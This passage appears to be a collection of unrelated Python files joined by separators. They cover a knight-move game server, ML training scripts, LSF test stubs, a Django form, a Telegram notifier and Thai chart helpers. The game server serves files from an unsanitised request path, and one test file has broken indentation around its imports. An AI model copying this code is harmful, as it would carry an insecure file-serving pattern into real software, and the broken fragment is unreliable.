        out-of-bounds cells, unknown board size, wrong endpoints, non-knight
        moves, or crossing segments)
    :return: score = number of segments in the chain
    """
    line, x, y = data
    # The 8 legal chess-knight displacement vectors.
    knight_dir = [(1, 2), (2, 1), (-1, 2), (2, -1), (-2, 1), (1, -2), (-1, -2), (-2, -1)]
    if len(line) == 0:
        raise SecurityError("STOP CHEATING! BAN! (Chain must be not empty)")
    if (len(set(line)) != len(line)):
        raise SecurityError("STOP CHEATING! BAN! (Points must be unique)")
    if (max(y) >= field_size[1] or min(y) < 0 or max(x) >= field_size[0] or min(x) < 0):
        raise SecurityError("STOP CHEATING! BAN! (Your chain is out of bounds!)")
    if (tuple(field_size) not in FIELDS_INFO):
        raise SecurityError("STOP CHEATING! BAN! (Incorrect field size)")
    if ((x[0], y[0]) != ends[0] or (x[-1], y[-1]) != ends[1]):
        raise SecurityError("STOP CHEATING! BAN! (Your chain has incorrect ends!)")
    # Every consecutive pair of points must differ by a knight move.
    for i in range(1, len(line)):
        if ((line[i][0]-line[i-1][0], line[i][1]-line[i-1][1]) not in knight_dir):
            raise SecurityError("STOP CHEATING! BAN! (Segments must be like a knight move)")
    # No two non-adjacent segments may cross (adjacent ones share an endpoint).
    for i in range(1, len(line)):
        for j in range(i+2, len(line)):
            if (intersect((line[i-1], line[i]), (line[j-1], line[j]))):
                raise SecurityError("STOP CHEATING! BAN! (Segments must not intersect)")
    return len(line) - 1
def save_results(result: tuple, field_size: tuple) -> None:
    """Merge a (name, score) pair into the per-board-size JSON leaderboard.

    Keeps each player's best score and trims the table to DB_SIZE entries,
    ordered by score (desc), ties broken by name.
    """
    if not os.path.isdir("Results"):
        os.mkdir("Results")
    table_path = os.path.join("Results", "table_{}_{}.json".format(field_size[0], field_size[1]))
    if not os.path.isfile(table_path):
        # Seed a fresh empty leaderboard file.
        with open(table_path, 'w', encoding="utf-8") as fresh_file:
            fresh_file.write("{}")
    with open(table_path, encoding="utf-8") as table_file:
        table = json.load(table_file)
    name, score = result
    if name not in table:
        table[name] = score
    table[name] = max(table[name], score)
    table = dict(sorted(table.items(), reverse=True, key=itemgetter(1, 0))[:DB_SIZE])
    with open(table_path, 'w', encoding="utf-8") as table_file:
        json.dump(table, table_file, indent=4, ensure_ascii=False)
class Handler(BaseHTTPRequestHandler):
    """Serves the static game client (GET) and validates score submissions (POST)."""

    # Static file extensions we are willing to serve, with their content types.
    _MIME_BY_SUFFIX = {
        ".html": "text/html",
        ".json": "text/plain",
        ".js": "application/javascript",
        ".png": "image/png",
        ".css": "text/css",
        ".ico": "image/icon",
        ".svg": "image/svg+xml",
    }

    def do_GET(self):
        if self.path == '/' or self.path == "":
            self.path = "/index.html"
        try:
            mimetype = None
            for suffix, candidate in self._MIME_BY_SUFFIX.items():
                if self.path.endswith(suffix):
                    mimetype = candidate
                    break
            if mimetype is not None:
                # Paths are served relative to the working directory.
                f = open("." + self.path, "rb")
                self.send_response(200)
                self.send_header("Content-type", mimetype)
                self.end_headers()
                self.wfile.write(f.read())
                f.close()
                return
        except IOError:
            self.send_error(404, "File Not Found: " + self.path)

    def do_POST(self):
        content_length = int(self.headers["Content-Length"])
        name, data = process(self.rfile.read(content_length).decode("utf8"))
        if data is None or name == "":
            # Malformed submission: silently drop it, matching original behavior.
            return
        field_size = (int(self.headers["Field-Size-X"]), int(self.headers["Field-Size-Y"]))
        try:
            result = verify_and_calc(data, field_size, FIELDS_INFO.get(field_size))
        except SecurityError as e:
            self.send_error(403, e.message)
            return
        print(name, field_size, "Score =", result, data[0])
        save_results((name, result), field_size)
        self.send_response(200)
        self.send_header("Content-type", "")
        self.end_headers()
# Run the HTTP server until interrupted; close the socket cleanly on Ctrl-C.
try:
    server = HTTPServer(("", PORT_NUMBER), Handler)
    server.serve_forever()
except KeyboardInterrupt:
    server.socket.close()
|
from flask import render_template
from flask_login import login_required
from . import bp
@bp.route("/alarm")
@login_required
def alarm_idx():
    """Render the alarm notifications page (requires an authenticated user)."""
    return render_template("notifications/alarm.html")
|
#!/usr/bin/env python3
import os
from tensorflow.examples.tutorials.mnist import input_data
import tensorflow as tf
data_dir = os.path.join(os.getenv('HOME'), 'var/data/mnist')
mnist = input_data.read_data_sets(data_dir, one_hot=True)
def slp(imput_size, class_number):
    """Build a single-layer perceptron (softmax regression) TF1 graph.

    :param imput_size: flattened input dimension (NOTE(review): name is a typo
        for "input_size" — kept unchanged to preserve the call interface)
    :param class_number: number of output classes
    :return: (input placeholder x, softmax output tensor y)
    """
    x = tf.placeholder(tf.float32, [None, imput_size])
    # Zero-initialized weights are fine here: softmax regression has no hidden
    # layer whose symmetry would need breaking.
    W = tf.Variable(tf.zeros([imput_size, class_number]))
    b = tf.Variable(tf.zeros([class_number]))
    y = tf.nn.softmax(tf.matmul(x, W) + b)
    return x, y
learning_rate = 0.5
x, y = slp(28 * 28, 10)  # MNIST images are 28x28 pixels, 10 digit classes
y_ = tf.placeholder(tf.float32, [None, 10])  # one-hot ground-truth labels
# Cross-entropy loss. NOTE(review): tf.log(y) is numerically unstable when a
# softmax output reaches 0 — tf.nn.softmax_cross_entropy_with_logits is safer.
loss = tf.reduce_mean(-tf.reduce_sum(y_ * tf.log(y), reduction_indices=[1]))
optmizer = tf.train.GradientDescentOptimizer(learning_rate)
train_step = optmizer.minimize(loss)
# Train
total = 60000
batch_size = 10000
n = total // batch_size
# sess = tf.InteractiveSession()
with tf.Session() as sess:
    sess.run(tf.global_variables_initializer())
    # NOTE(review): range(1, total // batch_size) performs n-1 steps, not n —
    # presumably unintentional; confirm before changing.
    for i in range(1, total // batch_size):
        print('step: %d' % i)
        xs, y_s = mnist.train.next_batch(batch_size)
        train_step.run({x: xs, y_: y_s})
    # Evaluate accuracy on the held-out test set.
    correct_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1))
    acc = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
    result = sess.run(acc, {x: mnist.test.images, y_: mnist.test.labels})
    print('accuracy: %f' % result)
|
import pandas as pd
import numpy as np
import sklearn
import sklearn.neighbors, sklearn.preprocessing, sklearn.datasets
import sklearn.model_selection  # FIX: `import sklearn` does not load submodules, so
# sklearn.model_selection.KFold below raised AttributeError without this import.

# NOTE(review): load_boston was removed in scikit-learn 1.2; this script needs
# an older scikit-learn version.
data = sklearn.datasets.load_boston()
targets = data['target']
scale_data = (sklearn.preprocessing.scale(X=data['data']))  # standardize features

# Scan the Minkowski exponent p over [1, 10]; keep the mean CV score for each.
values = np.linspace(1, 10, num=200)
acc = []
for value in values:
    clf = sklearn.neighbors.KNeighborsRegressor(n_neighbors=5, weights='distance', metric='minkowski', p=value)
    gener = sklearn.model_selection.KFold(n_splits=5, random_state=42, shuffle=True)
    accuracy = np.mean(sklearn.model_selection.cross_val_score(clf, cv=gener, X=scale_data, y=targets,
                                                               scoring='neg_mean_squared_error'))
    acc.append(accuracy)
best_score = max(acc)
# FIX: report the actual best p value; the old `acc.index(max(acc)) + 1` printed
# a 1-based list index, which is not the scanned p.
best_p = values[acc.index(best_score)]
print('max with scaling:', best_score, best_p)
with open('/data-out/metric.txt', 'w') as f:
    f.write(str(best_score))  # max score; `with` already closes the file
import telebot
from decouple import config
bot = telebot.TeleBot(config('BOT_TOKEN'))
def tg_send_order(message):
    """Forward an order notification to the two hard-coded staff chat IDs."""
    bot.send_message(897458587, message)
    bot.send_message(945903981, message)
def check_new_updates():
    """Fetch pending bot updates and print them (debug helper)."""
    updates = bot.get_updates()
    for update in updates:
        print(update)
|
#------------------------------------------------------------------------------
# Copyright 2008-2012 Istituto Nazionale di Fisica Nucleare (INFN)
#
# Licensed under the EUPL, Version 1.1 only (the "Licence").
# You may not use this work except in compliance with the Licence.
# You may obtain a copy of the Licence at:
#
# http://joinup.ec.europa.eu/system/files/EN/EUPL%20v.1.1%20-%20Licence.pdf
#
# Unless required by applicable law or agreed to in
# writing, software distributed under the Licence is
# distributed on an "AS IS" basis,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied.
# See the Licence for the specific language governing
# permissions and limitations under the Licence.
#------------------------------------------------------------------------------
"""
Part of WNoDeS framework.
Interface between WNoDeS processes an the batch system LSF
"""
import unittest
import time
from wnodes.utils import command
from wnodes.utils import batch_lsf
import sys
import threading
import commands
try:
from xml.etree import ElementTree
except ImportError:
try:
from elementtree import ElementTree # pylint: disable-msg=F0401
except ImportError:
sys.exit("package ElementTree is missing, exiting.")
class BadminFake(batch_lsf.Badmin):
    """Badmin stub returning canned `badmin` output instead of shelling out."""

    def get_output(self, option, status = 0):
        canned = {
            0: {'hclose': 'Close ...... done',
                'hopen': 'Open ...... done'},
        }
        return [status, canned[status][option]]
class BjobsFake(batch_lsf.Bjobs):
    """Bjobs stub: status 0 yields one fake RUN job listing, status 1 yields 'No'."""

    def get_output(self, status = 0):
        job_listing = ('JOBID USER STAT QUEUE FROM_HOST EXEC_HOST'
                       ' JOB_NAME SUBMIT_TIME\n4432916 superb036 RUN superb'
                       ' ce04-lcg wn-205-01-15-02-b cr004_624025965 Mar 1 16:16')
        canned = {0: job_listing, 1: 'No'}
        return [status, canned[status]]
class BkillFake(batch_lsf.Bkill):
    """Bkill stub pretending the job already finished."""

    def get_output(self):
        return [0, 'Job <%s>: Job has already finished' % self.__jobid__]
class BmodFake(batch_lsf.Bmod):
    """Bmod stub acknowledging a parameter change."""

    def get_output(self):
        return [0, 'Parameter of <%s> are being changed' % self.__jobid__]
class BreserveFake(batch_lsf.Breserve):
    """Breserve stub returning empty output."""

    def get_output(self):
        return [0, '']
class BrunFake(batch_lsf.Brun):
    """Brun stub: always reports the job as being forced to run."""

    def get_output(self):
        return [0, 'Job <%s> is being forced to run.' % self.__jobid__]
class BsubFake(batch_lsf.Bsub):
    """Bsub stub: always reports a successful submission of job 54534534."""

    def get_output(self):
        return [0, 'Job <54534534> is submitted to default queue <argo>.']
class BatchLsfTestCase(unittest.TestCase):
    """Exercises the LSF command wrappers through the *Fake subclasses above,
    so the suite runs without a live LSF installation.

    NOTE(review): Python 2 code (print statements) using the deprecated
    unittest ``assert_`` alias.
    """

    def __init__(self, method_name):
        unittest.TestCase.__init__(self, method_name)
        # Batch-system profile name passed to every wrapper under test.
        self.profile = 'pap'

    def test_badmin_hclose(self):
        """test badmin hclose"""
        b_admin = BadminFake(self.profile, 'hclose', 'a.b.c.d')
        b_admin_cmd = b_admin.get_command()
        print b_admin_cmd
        b_admin_output = b_admin.get_output('hclose')
        #print b_admin_output
        self.assert_('Close' in b_admin_output[1])

    def test_badmin_hopen(self):
        """test badmin hopen"""
        b_admin = BadminFake(self.profile, 'hopen', 'a.b.c.d')
        b_admin_cmd = b_admin.get_command()
        print b_admin_cmd
        b_admin_output = b_admin.get_output('hopen')
        #print b_admin_output
        self.assert_('Open' in b_admin_output[1])

    def test_bjobs(self):
        """test bjobs"""
        b_jobs = BjobsFake(self.profile, jobid = '', user = '')
        b_jobs_cmd = b_jobs.get_command()
        print b_jobs_cmd
        # status=1 simulates "no jobs found".
        b_jobs_output = b_jobs.get_output(status=1)
        self.assertEqual('No', b_jobs_output[1])

    def test_bjobs_jobid(self):
        """test bjobs with jobid"""
        b_jobs = BjobsFake(self.profile, jobid = '54534534', user = '')
        b_jobs_cmd = b_jobs.get_command()
        print b_jobs_cmd
        b_jobs_output = b_jobs.get_output(status=1)
        self.assertEqual('No', b_jobs_output[1])

    def test_bjobs_user(self):
        """test bjobs with user"""
        b_jobs = BjobsFake(self.profile, jobid = '', user = 'joda001')
        b_jobs_cmd = b_jobs.get_command()
        print b_jobs_cmd
        b_jobs_output = b_jobs.get_output(status=1)
        self.assertEqual('No', b_jobs_output[1])

    def test_bjobs_jobid_success(self):
        """test bjobs with jobid and success"""
        b_jobs = BjobsFake(self.profile, jobid = '54534534', user = '')
        b_jobs_cmd = b_jobs.get_command()
        print b_jobs_cmd
        # Default status=0 returns the canned listing (header starts 'JOBID').
        b_jobs_output = b_jobs.get_output()
        self.assert_('JOBID' in b_jobs_output[1])

    def test_bkill(self):
        """test bkill"""
        b_kill = BkillFake(self.profile, '54534534', user = '')
        b_kill_cmd = b_kill.get_command()
        print b_kill_cmd
        b_kill_output = b_kill.get_output()
        self.assert_('54534534' in b_kill_output[1])

    def test_bkill_user(self):
        """test bkill with user"""
        b_kill = BkillFake(self.profile, '54534534', user = 'joda001')
        b_kill_cmd = b_kill.get_command()
        print b_kill_cmd
        b_kill_output = b_kill.get_output()
        self.assert_('54534534' in b_kill_output[1])

    def test_bmod_jobid_option(self):
        """test bmod with jobid and option"""
        b_mod = BmodFake(self.profile, '-Un', '54534534')
        b_mod_cmd = b_mod.get_command()
        print b_mod_cmd
        b_mod_output = b_mod.get_output()
        self.assert_('54534534' in b_mod_output[1])

    def test_breserve_add_hostname_option_user(self):
        """test breserve add with hotname, option and user"""
        # Reservation window: starts in ~70s, ends in ~200s (LSF mm:dd:HH:MM).
        start_reservation = time.strftime("%m:%d:%H:%M",
            time.localtime(time.time() + 70))
        end_reservation = time.strftime("%m:%d:%H:%M",
            time.localtime(time.time() + 200))
        b_reserve = BreserveFake(self.profile, 'add', '97698789',
            hostname = 'a.c.d.it', option = '-n 1 -o -b %s -e %s' %
            (start_reservation, end_reservation), user = 'joda001')
        b_reserve_cmd = b_reserve.get_command()
        print b_reserve_cmd
        # Success produces empty output; no assertion made here.
        b_reserve_output = b_reserve.get_output()

    def test_breserve_del(self):
        """test breserve del"""
        b_reserve = BreserveFake(self.profile, 'del', '97698789')
        b_reserve_cmd = b_reserve.get_command()
        print b_reserve_cmd
        b_reserve_output = b_reserve.get_output()

    def test_brun(self):
        """test brun"""
        b_run = BrunFake(self.profile, 'a.c.d.it', '54534534')
        b_run_cmd = b_run.get_command()
        print b_run_cmd
        b_run_output = b_run.get_output()

    def test_bsub(self):
        """test bsub"""
        b_sub = BsubFake(self.profile, 'cippa', user = '')
        b_sub_cmd = b_sub.get_command()
        print b_sub_cmd
        b_sub_output = b_sub.get_output()

    def test_bsub_user(self):
        """test bsub with user"""
        b_sub = BsubFake(self.profile, 'cippa', user = 'joda001')
        b_sub_cmd = b_sub.get_command()
        print b_sub_cmd
        b_sub_output = b_sub.get_output()
def main():
    """Collect all BatchLsfTestCase tests and run them verbosely."""
    loader = unittest.TestLoader()
    runner = unittest.TextTestRunner(verbosity=2)
    runner.run(loader.loadTestsFromTestCase(BatchLsfTestCase))

if __name__ == '__main__':
    main()
|
from django.db.models.query import QuerySet
from django.db.models.sql.query import Query
from twango.db import connections
from twango.decorators import call_in_thread
from twisted.internet import threads
class TwistedQuery(Query):
    """Django Query subclass whose compiler resolves database connections
    through twango's (Twisted-aware) connection registry."""

    def twisted_compiler(self, using=None, connection=None):
        """
        !!! NOT YET USED

        Build a SQL compiler bound to a twango connection.

        Exactly one of *using* (a connection alias) or *connection* must be
        supplied; passing neither raises ValueError.
        """
        if using is None and connection is None:
            raise ValueError("Need either using or connection")
        if using:
            connection = connections[using]
        else:
            # Re-resolve the supplied connection by alias through twango's
            # registry so the compiler always gets a twango connection.
            connection = connections[connection.alias]
        # Check that the compiler will be able to execute the query
        for alias, aggregate in self.aggregate_select.items():
            connection.ops.check_aggregate_support(aggregate)
        return connection.ops.compiler(self.compiler)(self, connection, using)
class TwistedQuerySet(QuerySet):
    """QuerySet that executes blocking ORM operations in a thread (via the
    call_in_thread decorator) so they can be awaited from Twisted code."""

    def __init__(self, model=None, query=None, using=None, hints=None):
        query = query or TwistedQuery(model)
        super(TwistedQuerySet, self).__init__(model=model, query=query, using=using, hints=hints)
        # Default callbacks used by _super_threaded; can be overridden per
        # call through the success_callback / error_callback kwargs.
        self.success_callback = None
        self.error_callback = None

    def twist(self):
        """
        !!! NOT YET USED
        Use twisted database api to run the query and return the raw results in a deferred
        """
        query = self.query
        assert(isinstance(query, Query))
        compiler = query.get_compiler(self.db)
        sql, params = compiler.as_nested_sql()
        if not sql:
            # Nothing to execute (implicitly returns None).
            return
        connection = connections[self.db]
        return connection.runQuery(sql, params)

    def _super_threaded(self, name, *args, **kwargs):
        # Run the parent QuerySet method *name* in a worker thread, firing
        # the configured success/error callbacks with the outcome.
        success_callback = kwargs.pop('success_callback', self.success_callback)
        error_callback = kwargs.pop('error_callback', self.error_callback)
        @call_in_thread(success_callback, error_callback)
        def function():
            return getattr(super(TwistedQuerySet, self), name)(*args, **kwargs)
        return function()

    def _clone(self, klass=None, setup=False, **kwargs):
        # Carry the callbacks over to the clone.  NOTE(review): klass/setup
        # are accepted for older-Django signatures but never forwarded —
        # confirm against the Django version in use.
        self.success_callback = kwargs.pop('success_callback', self.success_callback)
        self.error_callback = kwargs.pop('error_callback', self.error_callback)
        return super(TwistedQuerySet, self)._clone(**kwargs)

    # Threaded wrappers around the standard QuerySet API; each returns
    # whatever call_in_thread returns (presumably a Deferred — confirm in
    # twango.decorators).
    def all(self, **kwargs):
        # not working in django 1.11+
        # go to TwistedManager
        return self._super_threaded('all', **kwargs)

    def none(self, **kwargs):
        return self._super_threaded('none', **kwargs)

    def count(self, **kwargs):
        return self._super_threaded('count', **kwargs)

    def get(self, *args, **kwargs):
        return self._super_threaded('get', *args, **kwargs)

    def get_or_create(self, **kwargs):
        return self._super_threaded('get_or_create', **kwargs)

    def delete(self, **kwargs):
        return self._super_threaded('delete', **kwargs)

    def update(self, values, **kwargs):
        return self._super_threaded('update', values, **kwargs)

    def in_bulk(self, id_list, **kwargs):
        return self._super_threaded('in_bulk', id_list, **kwargs)
|
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
import vggish_params as params
import pdb
class Vggish(nn.Module):
    """VGG-style audio network: a convolutional trunk followed by a fully
    connected head that emits a 100-dimensional embedding.

    forward() expects input of shape (batch, 1, H, W) with H*W such that the
    trunk output flattens to 512*6*4 features (e.g. 96x64 input).
    """

    def __init__(self):
        super(Vggish, self).__init__()
        self.features = self.make_layers()
        self.fc = nn.Sequential(
            nn.Linear(512 * 6 * 4, 1024),
            nn.ReLU(),
            nn.Dropout(),
            nn.Linear(1024, 100),
            nn.BatchNorm1d(100, affine=False),
            nn.Dropout()
        )

    def make_layers(self):
        """Assemble the conv trunk: ints are Conv2d output channels (each
        followed by ReLU), "M" is a 2x2 max-pool."""
        layers = []
        channels = 1
        for spec in [64, "M", 128, "M", 256, 256, "M", 512, 512, "M"]:
            if spec == "M":
                layers.append(nn.MaxPool2d(kernel_size=2, stride=2))
            else:
                layers.append(nn.Conv2d(channels, spec, kernel_size=3, padding=1))
                layers.append(nn.ReLU(inplace=True))
                channels = spec
        return nn.Sequential(*layers)

    def forward(self, x):
        """Map a spectrogram batch to (batch, 100) embeddings."""
        batch = x.size(0)
        feats = self.features(x)
        return self.fc(feats.view(batch, -1))
class MyModel(nn.Module):
    """Classification head on top of the Vggish embedding network.

    :param num_class: number of output classes.
    :param num_unit: hidden width of the classifier MLP.
    :param weights_path: optional path to a numpy checkpoint saved as
        np.savez(..., dict=<0-d object array wrapping a name->ndarray map>).
    """

    def __init__(self, num_class=10, num_unit=1024, weights_path=None):
        super(MyModel, self).__init__()
        self.vggish = Vggish()
        # NOTE: attribute name 'classifer' (sic) kept so existing state
        # dicts / callers keep working.
        self.classifer = nn.Sequential(
            nn.Linear(100, num_unit),
            nn.ReLU(),
            nn.Dropout(),
            nn.Linear(num_unit, num_class)
        )
        if weights_path is not None:
            self.load_weights(weights_path)

    def forward(self, x):
        """Return per-class probabilities (softmax over the class dim)."""
        x = self.vggish(x)
        x = self.classifer(x)
        return F.softmax(x, dim=1)

    def load_weights(self, weights_path):
        """Copy matching 'vggish' parameters from a numpy checkpoint.

        Fix: the checkpoint stores a pickled 0-d object array under key
        'dict'; since NumPy 1.16.3 np.load refuses to unpickle object arrays
        unless allow_pickle=True is passed explicitly, so the original call
        raised ValueError on modern NumPy.
        """
        data = np.load(weights_path, allow_pickle=True)
        weights = data['dict'][()]
        weights_name = weights.keys()
        for name, param in self.named_parameters():
            # Only restore trunk (vggish) parameters present in the checkpoint.
            if name in weights_name and 'vggish' in name:
                param.data = torch.from_numpy(weights[name])
|
from django import forms
#from .models import Profile
from .models import Education
# class ProfileForm(forms.ModelForm):
#
# class Meta:
# model = Profile
# fields = ('firstName', 'lastName', 'contact')
#class EducationForm(forms.ModelForm):
# Gender choices for the form's ChoiceField: (stored value, display label).
CATEGORIES = (
    ('M', 'Male'),
    ('F', 'Female'),
    ('O', 'Other'),
)
class SecondaryEducationForm(forms.ModelForm):
    """Applicant profile form: personal details, school/college results,
    internships, a project, skills and social links — all backed by the
    Education model."""

    # Explicit ChoiceField so gender input is restricted to CATEGORIES.
    gender = forms.ChoiceField(choices=CATEGORIES, required=True)

    class Meta:
        model = Education
        fields = ('name', 'homeadd', 'dob', 'contact','gender', 'yoc1', 'board1', 'percentage1', 'yoc2', 'board2', 'percentage2',
            'yoc3', 'percentage3','college','course',
            'company_i', 'duration', 'profile_i', 'company_i2', 'duration2', 'profile_i2',
            'title_p','description_p','skills', 'work', 'git_hub', 'linked_in',)
        # Human-readable labels kept here (disabled) for reference:
        # labels = {
        # 'yoc1': "Year of completion(1)",
        # 'board1':"Name of the Board",
        # 'percentage1': "Percentage/ CGPA",
        # 'yoc2': "Year of completion(2)",
        # 'board2': "Name of the Board",
        # 'percentage2': "Percentage/ CGPA",
        # 'name': "Name of the Applicant",
        # 'college': "Name of the College",
        # 'dob': "Date Of Birth",
        # 'homeadd': "Permanent Address",
        # 'contact': "Contact No.",
        # 'git_hub': "Add link to GitHub Profile",
        # 'linked_in': "Add link to Linkedin Profile",
        # 'company': "Name of the Company",
        # 'duration': "Duration of Internship(in months)",
        # 'work': "Work Profile/Designation",
        #}
def add(num1, num2):
    """Print and return the sum of *num1* and *num2*.

    Improvement: the original only printed; returning the result makes the
    function usable programmatically (callers that ignored the None return
    are unaffected).
    """
    result = num1 + num2
    print('Addition: %d' % result)
    return result
def subtract(num1, num2):
    """Print and return the absolute difference of *num1* and *num2*.

    Improvement: also return the value (backward compatible; the original
    returned None).
    """
    result = abs(num1 - num2)
    print('Subtraction: %d' % result)
    return result
def multiply(num1, num2):
    """Print and return the product of *num1* and *num2*.

    Improvement: also return the value (backward compatible; the original
    returned None).
    """
    result = num1 * num2
    print('Multiplication: %d' % result)
    return result
def divide(num1, num2):
    """Print (formatted with %d, i.e. truncated toward zero for display) and
    return num1 / num2 as true division.

    Raises ZeroDivisionError for num2 == 0, mirroring the original behavior.
    Improvement: also return the exact quotient (the original returned None).
    """
    result = num1 / num2
    print('Division: %d' % result)
    return result
# Quick demo of the four operations; expected printed values in the comments.
add(2, 2) # 4
subtract(2, 10) # 8
multiply(5, 3) # 15
divide(10, 2) # 5
# !/usr/bin/python
# coding=utf-8
from flask import request,jsonify,session,render_template
from flask_restful import Resource,reqparse
import numpy as np
import pandas as pd
import math
import sys
import json
from datetime import datetime
# sys.path.insert(0, './functions')
sys.path.insert(0, './module')
import functions
def distribution():
    # show data distribution of single numerical data
    # Builds {'Colnames', 'Values', 'Descriptions'} for every column the
    # analyzer (module-global df_obj) selects for a histogram.
    result = df_obj.graph_selector('histogram')
    print("result his",result)
    distribution = {'Colnames':[],'Values':[],'Descriptions':[]}
    # colname = df_obj.data_type[df_obj.data_type.col_type == "numeric"].col_name.to_list()
    if result is not None:
        colname = result['col_name']
        for x in colname:
            # Thai: "this graph is the distribution of {column}"
            description = 'กราฟนี้คือการกระจายตัวของ{}'.format(x)
            distribution['Colnames'].append(x)
            distribution_df = df_obj.df.filter([x], axis=1)
            distribution_df.columns = ['value']
            distribution['Values'].append({x:distribution_df.to_dict(orient='records')})
            # description session
            # print(result[result.col_name==x].dis_type.values[0])
            # Append the detected distribution shape / modality, if any.
            if result[result.col_name==x].dis_type.values[0] is not None:
                description_dis_type = ' โดยกราฟมีลักษณะ{}'.format(result[result.col_name==x].dis_type.values[0])
                description = description+description_dis_type
            if result[result.col_name==x].mode_type.values[0] is not None:
                description_mode_type = 'และมีลักษณะการกระจายตัวแบบ{}'.format(result[result.col_name==x].mode_type.values[0])
                description = description+description_mode_type
            distribution['Descriptions'].append({x:description})
    return distribution
def scatter():
    # show correlation between 2 numerical data
    # One scatter payload per column pair selected by the analyzer.
    result = df_obj.graph_selector('scatter')
    # print(result)
    scatter = {'Colnames':[],'Values':[],'Descriptions':[]}
    # corrlist = df_obj.data_comb[(df_obj.data_comb.col_1_type == "numeric") & (df_obj.data_comb.col_2_type == "numeric")].loc[:, ['col_1_name','col_2_name']].values.tolist()
    # print(result)
    if result is not None:
        corrlist = result[['col_1_name','col_2_name']].values.tolist()
        for corr in corrlist:
            # Thai: "this graph shows the relationship between {a} and {b}"
            description = 'กราฟนี้คือการความสัมพันธ์ระหว่าง {} และ {} '.format(corr[0],corr[1])
            str1 = ','.join([str(elem) for elem in corr])
            temp = df_obj.df[corr]
            temp.columns = ['x','y']
            temp = temp.to_dict(orient='records')
            scatter['Colnames'].append(str1)
            scatter['Values'].append({str1:temp})
            # description
            if result[(result.col_1_name==corr[0]) & (result.col_2_name==corr[1])].corr_type.values[0] is not None:
                description_corr_type = result[(result.col_1_name==corr[0]) & (result.col_2_name==corr[1])].corr_type.values[0]
                # Map the analyzer's English correlation label to its Thai
                # description ('postive' spelling matches the analyzer's labels).
                if description_corr_type == 'strong postive':
                    description_corr_type ='มีลักษณะความสัมพันธ์มากในเชิงบวก'
                elif description_corr_type == 'strong negative':
                    description_corr_type ='มีลักษณะความสัมพันธ์มากในเชิงลบ'
                elif description_corr_type == 'moderate postive':
                    description_corr_type ='มีลักษณะความสัมพันธ์ในเชิงบวก'
                elif description_corr_type == 'moderate negative':
                    description_corr_type ='มีลักษณะความสัมพันธ์ในเชิงลบ'
                description = description + description_corr_type
            scatter['Descriptions'].append({str1: description})
    return scatter
def heatmap():
    """Build the correlation-heatmap payload from the global df_obj: one
    {'x', 'y', 'value'} cell per pair of numeric columns, plus the list of
    numeric column names."""
    corr_cells = df_obj.df.corr().unstack().to_dict()
    payload = {'Colnames': [], 'Values': [], 'Descriptions': []}
    payload['Values'] = [{'x': pair[0], 'y': pair[1], 'value': value}
                         for pair, value in corr_cells.items()]
    numeric_cols = df_obj.data_type[df_obj.data_type.col_type == "numeric"].col_name.to_list()
    for col in numeric_cols:
        payload['Colnames'].append(col)
        payload['Descriptions'].append("กราฟนี้แสดง")
    return payload
def boxplot():
    # show data qualtile and outliner of single data
    # One box-plot payload per column the analyzer selects for a box plot.
    result = df_obj.graph_selector('box')
    # print(result)
    boxplot = {'Colnames':[],'Values':[],'Descriptions':[]}
    # colname = df_obj.data_type[df_obj.data_type.col_type == "numeric"].col_name.to_list()
    # print(result)
    if result is not None:
        colname = result['col_name']
        for x in colname:
            # Thai summary quoting the column's mean, min and max.
            description = 'กราฟนี้เป็นกราฟของ {0} โดยแสดงถึงค่าการกระจายตัวของกลุ่ม ซึ่งจากกราฟพบว่าค่าเฉลี่ยของข้อมูลอยู่ที่ {1:.2f} มีค่าต่ำสุดคือ {2:.2f} และค่าสูงสุดคือ {3:.2f}'.format(x,result[result.col_name == x]['mean'].values[0],result[result.col_name == x]['min'].values[0],result[result.col_name == x]['max'].values[0])
            boxplot['Colnames'].append(x)
            boxplot_df = df_obj.df.filter([x], axis=1)
            boxplot['Values'].append({x:boxplot_df[x].to_list()})
            # description
            # Mention the outlier fraction when the analyzer reports one.
            if result[result.col_name == x].outlier_percent.values[0] is not None:
                description_outlier_percent = 'ปริมาณข้อมูลที่อยู่ห่างจากกลุ่มมาก ๆ มีอยู่ {0:.2f} % ซึ่งเป็นปริมาณที่{1}'.format(result[result.col_name == x].outlier_percent.values[0]*100,result[result.col_name == x].argument.values[0])
                description = description+description_outlier_percent
            boxplot['Descriptions'].append({x:description})
    return boxplot
def bar_cat():
    # Bar chart of per-category counts for each column the analyzer selects.
    result = df_obj.graph_selector('bar')
    bar_cat = {'Colnames':[],'Values':[],'Descriptions':[]}
    print(result)
    if result is not None:
        colname = result['col_name']
        for x in colname:
            # Thai: "this graph compares the quantities of {column}"
            description = 'กราฟนี้เป็นแสดงการเปรียบเทียบปริมาณของ{} '.format(x)
            bar_cat['Colnames'].append(x)
            # cat_count holds per-column value counts; transpose to a single
            # record of {category: count}.
            tempT = df_obj.cat_count[x].T.to_dict(orient='records')[0]
            bar = []
            for i in tempT:
                bar.append({'name':i,'value':tempT[i]})
            bar_cat['Values'].append({x:bar})
            # Append each analyzer finding that is present for this column.
            if result[result.col_name == x].argument.values[0] is not None:
                description = description + 'ซึ่งมีลักษณะของข้อมูลอยู่ในรูปแบบที่เป็น{} '.format(result[result.col_name == x].argument.values[0])
            if result[result.col_name == x].anomal_attribute.values[0] is not None:
                description = description + 'มี anomal attribute {} '.format(result[result.col_name == x].anomal_attribute.values[0])
            if result[result.col_name == x].anomal_value.values[0] is not None and not math.isnan(result[result.col_name == x].anomal_value.values[0]):
                description = description + 'มี anomal value {} '.format(result[result.col_name == x].anomal_value.values[0])
            if result[result.col_name == x].percent_dominate.values[0] is not None and not math.isnan(result[result.col_name == x].percent_dominate.values[0]):
                description = description + 'มี percent dominate อยู่ที่ {0:.2f} % '.format(result[result.col_name == x].percent_dominate.values[0]*100 )
            bar_cat['Descriptions'].append({x:description})
    return bar_cat
def ecdf():
    # Empirical CDF payload per column the analyzer selects for an ecdf plot.
    result = df_obj.graph_selector('ecdf')
    # print(result)
    ecdf = {'Colnames':[],'Values':[],'Descriptions':[]}
    # colname = df_obj.data_type[df_obj.data_type.col_type == "numeric"].col_name.to_list()
    if result is not None:
        colname = result['col_name']
        for x in colname:
            # print(x)
            # Thai: "this graph is the empirical cumulative distribution of {x}"
            description = 'กราฟนี้เป็นกราฟแจกแจงสะสมเชิงประจักษ์ของ {} '.format(x)
